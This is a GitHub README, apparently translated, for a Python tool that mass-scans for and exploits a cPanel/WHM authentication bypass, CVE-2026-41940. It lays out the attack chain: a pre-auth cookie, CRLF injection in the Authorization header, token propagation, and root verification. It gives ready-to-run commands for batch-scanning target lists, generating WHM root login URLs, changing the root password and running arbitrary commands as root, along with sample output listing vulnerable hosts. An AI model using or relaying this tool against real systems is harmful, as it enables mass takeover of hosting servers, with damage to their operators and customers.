Lutfifakee-Project/CVE-2026-41940

GitHub: Lutfifakee-Project/CVE-2026-41940

针对 cPanel/WHM CVE-2026-41940 身份验证绕过漏洞的批量扫描与利用工具,实现了从漏洞检测到 root 级 RCE 的完整攻击链。

Stars: 1 | Forks: 0

# CVE-2026-41940 - cPanel/WHM 身份验证绕过扫描与利用工具 [![Python](https://img.shields.io/badge/Python-3.7+-blue.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/License-MIT-red.svg)](LICENSE) [![Security](https://img.shields.io/badge/Security-Research-orange.svg)](https://github.com/Lutfifakee-Project) [![Tested on](https://img.shields.io/badge/Tested%20on-Linux%20%7C%20Windows-lightgrey.svg)]() **针对 CVE-2026-41940 的 cPanel/WHM 身份验证绕过扫描与利用工具** ## ⚠️ 免责声明 本工具仅供**教育目的和授权安全测试使用**。 使用本工具即表示您同意: - 您仅测试您**拥有**或已获得**明确书面许可**进行测试的系统。 - 您了解**未经授权访问计算机系统是违法行为**。 - 您对使用本工具期间的行为负全部责任。 - **您不得重新分发、修改或将本工具据为己有。** ❗ 作者**对因使用本工具而导致的任何滥用、非法活动、损害或法律后果概不负责**。 ## 🎯 概述 CVE-2026-41940 是 cPanel/WHM 中的一个严重身份验证绕过漏洞,可能允许攻击者在没有有效凭证的情况下获得未经授权的 root 级别访问权限。 本工具提供了一个基于 Python 的实现,可用于: - 检测目标漏洞 - 自动化漏洞利用(用于授权测试) - 执行大规模扫描 ## 🔥 4 阶段攻击链 | 阶段 | 描述 | |------|------------| | **1. 预身份验证** | 向 `/login/` 发送无效凭证以获取 `whostmgrsession` cookie | | **2. CRLF 注入** | 通过 `Authorization: Basic` 请求头注入换行符以泄露 `cpsess` token | | **3. Token 传播** | 触发 `do_token_denied` 以将 token 传播到缓存中 | | **4. 验证** | 访问 `/json-api/version` 以确认 WHM root 访问权限 | ## ✨ 功能特性 | 功能 | 描述 | |--------|------------| | 🔄 批量扫描 | 并发扫描多个目标 | | 🎯 单一目标 | 扫描单个目标并输出详细信息 | | 🔌 端口扫描 | 自动扫描 WHM 端口 (2082, 2083, 2086, 2087) | | 🔓 Session URL | 生成一键 WHM 登录 URL | | 💀 RCE | 以 root 身份执行系统命令 | | 🔑 修改密码 | 更改 WHM root 密码 | | 📡 WHM API 调用 | 调用 WHM API 函数 | | 🎨 彩色输出 | 结果的可视化输出 | | 💾 导出结果 | 将存在漏洞的目标保存到文件 | ## 📋 环境要求 ``` Python 3.7+ pip install requests urllib3 ``` ## 🚀 安装说明 ``` git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git cd CVE-2026-41940 pip install -r requirements.txt # 使用单一目标测试 python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com ``` ## 📖 使用说明 ### 基本命令 ``` # 单一目标 python cpanel-mass-checker.py -u https://target.com:2087 # Batch scan python cpanel-mass-checker.py -f targets.txt -c 20 # 带端口扫描的 Batch scan python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt # 生成 session URL python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com # 更改 root 密码 python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com # 执行命令 (RCE) python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com # WHM API 调用 python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com ``` ## 📄 目标文件格式 (`targets.txt`) ``` # 以 # 开头的行是注释 https://target1.com:2087 target2.com 192.168.1.100 cpanel.example.com:2083 ``` ## ⚙️ 参数 | 参数 | 描述 | 示例 | |----------|------------|--------| | -u | 单个目标 URL | -u https://target.com:2087 | | -f | 目标列表文件 | -f targets.txt | | -c | 并发数 (线程数) | -c 20 | | -o | 输出文件 | -o results.txt | | -hostname | 自定义 Host 请求头 | -hostname cpanel.target.com | | --scan-ports | 扫描所有 WHM 端口 | --scan-ports | | -session | 生成登录 URL | -session | | -passwd | 更改 root 密码 | -passwd "NewPass123" | | -cmd | 执行命令 | -cmd "id" | | -keep | 保留临时账户 | -keep | | -api | 调用 WHM API | -api listaccts | | -api-params | API 参数 | -api-params "user=root,password=123" | ## 📊 输出示例 ### 批量扫描 ``` [*] Total: 4 targets (after dedup), concurrency: 10 [*] Port scanning: ON (2082, 2083, 2086, 2087) ------------------------------------------------------------ [2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410 [1/4] [SAFE] safe-target.com ------------------------------------------------------------ [*] Scan completed. Vulnerable: 1 [+] Results saved to result.txt ``` ### Session URL 生成 ``` [0] hostname = example.com [1] minting a preauth session... [2] sending the CRLF injection... [3] firing do_token_denied... [4] verifying WHM root access... [+] WHM root access obtained! [+] Session URL: https://example.com:2087/cpsessXXXXXXX/ ``` ## 🛡️ 漏洞详情 | 字段 | 值 | |------|------| | CVE | CVE-2026-41940 | | 严重性 | Critical (CVSS 9.8) | | 攻击向量 | 网络 | | 所需权限 | 无 | | 用户交互 | 无 | ### 受影响版本 - WHM 11.110.x < 11.110.0.97 - WHM 11.118.x < 11.118.0.63 - WHM 11.126.x < 11.126.0.54 - WHM 11.132.x < 11.132.0.29 - WHM 11.134.x < 11.134.0.20 - WHM 11.136.x < 11.136.0.5 ## ⚠️ 重要提示 - 仅在已授权的系统上使用 - Session token 过期速度很快 - RCE 在受限许可证上可能会失败 - 某些目标需要 `-hostname` - 所有流量均使用 HTTPS ## 🧪 测试环境 为安全且合法的测试: - 使用您自己的 VPS/服务器 - 搭建一个存在漏洞的实验环境 - 始终获取书面许可 ## ⭐ 支持 如果这个项目对您有帮助,请考虑给它一个 ⭐
标签:CISA项目, cPanel, CRLF注入, CVE-2026-41940, Maven, PoC, Python, Root权限, Session劫持, Web安全, WHM, 威胁情报, 开发者工具, 批量扫描器, 提权, 无后门, 暴力破解, 未授权访问, 漏洞验证, 系统独立性, 网络安全, 自动化攻击, 蓝队分析, 身份验证绕过, 逆向工具, 隐私保护